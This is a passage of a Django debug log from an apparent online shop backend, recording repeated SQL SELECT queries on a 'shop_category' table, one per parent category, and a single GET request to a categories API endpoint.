"shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:56:07,775 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:56:07,777 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:56:07,780 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:56:07,782 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:56:07,785 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:56:07,788 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:56:07,790 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:56:07,792 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:56:07,794 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:56:07,798 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:56:07,800 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:56:07,802 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:56:07,805 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:56:07,807 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:56:07,809 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:56:07,812 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:56:07,815 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:56:07,817 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:56:07,819 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:56:07,821 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:56:07,825 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:56:07,827 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:56:07,829 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:56:07,831 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:56:07,834 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:56:07,837 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:56:07,840 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:56:07,842 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:56:07,844 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:56:07,846 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:56:07,849 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:56:07,851 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:56:07,854 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:56:07,856 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:56:07,860 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:56:07,863 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:56:07] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 13:56:08,122 utils 4252 140031492613888 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:56:08,129 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:56:08,133 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:56:08,135 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:56:08,138 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:56:08,141 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:56:08,143 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:56:08,145 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:56:08,147 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:56:08,151 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:56:08,153 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:56:08,155 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:56:08,158 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:56:08,160 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:56:08,163 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:56:08,166 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:56:08,168 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:56:08,170 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:56:08,173 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:56:08,177 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:56:08,179 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:56:08,181 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:56:08,185 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:56:08,188 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:56:08,190 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:56:08,194 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:56:08,196 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:56:08,199 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:56:08,201 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:56:08,203 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:56:08,207 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" 